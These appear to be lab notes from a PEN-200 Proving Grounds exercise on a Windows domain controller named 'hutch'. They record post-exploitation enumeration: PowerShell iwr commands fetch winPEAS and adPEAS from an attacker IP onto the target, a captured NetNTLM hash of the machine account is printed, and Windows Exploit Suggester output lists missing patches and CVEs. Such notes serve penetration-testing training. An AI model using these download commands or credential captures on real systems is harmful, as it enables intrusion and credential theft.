PEAS
Conducting automated enumeration after performing manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.204/winPEASany.exe -OutFile .\winPEASany.exe
Delivery complete
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: HUTCHDC
USERPROFILE: C:\Windows\system32\config\systemprofile
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Windows\system32\config\systemprofile\AppData\Local
PSModulePath: WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PSExecutionPolicyPreference: Bypass
SystemRoot: C:\Windows
APP_POOL_ID: DefaultAppPool
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
APP_POOL_CONFIG: C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: HUTCHDC$
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Windows\TEMP
NUMBER_OF_PROCESSORS: 1
APPDATA: C:\Windows\system32\config\systemprofile\AppData\Roaming
TMP: C:\Windows\TEMP
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: HUTCH
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
N/A
LAPS
UAC
PowerShell
KrbRelayUp
NTLM
HUTCHDC$::HUTCH:1122334455667788:6d1cb4d92e0c8417806f0688d5bf4ac4:01010000000000009a63dae5abbadb01f49540b2e68bf1770000000008003000300000000000000000000000003000001f145ea1b122bba82a51ccb1e8ad36d6a21651f8c6fa026fba48621025d3a28f0a00100000000000000000000000000000000000090000000000000000000000
.NET
Token Privileges (iis apppool\defaultapppool)
AutoLogon
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ HUTCH
DefaultUserName REG_SZ
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x32a4003a
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
Modifiable Services
SMB
adPEAS
PS C:\tmp> iwr -Uri http://192.168.45.204/adPEAS.ps1 -OutFile .\adPEAS.ps1
Delivery complete
Executing adPEAS
Domain
Add-Computer
DCSync
SharpHound
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250425
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2019
- Generation: 2019
- Build: 17763
- Version: 1809
- Architecture: x64-based
- Installed hotfixes (7): KB4580422, KB4462930, KB4512577, KB4577667, KB4580325, KB4587735, KB4592440
[+] Loading definitions
- Creation date of definitions: 20250425
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2019
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2019
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows Server 2019
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
[-] Missing patches: 4
- KB: patches 4 vulnerabilities
- KB5055519: patches 4 vulnerabilities
- KB4578966: patches 4 vulnerabilities
- KB4535101: patches 4 vulnerabilities
[I] KB with the most recent release date
- ID: KB
- Release date: 20250415
[+] Done. Displaying 16 of the 1597 vulnerabilities found.
CVE-2025-29824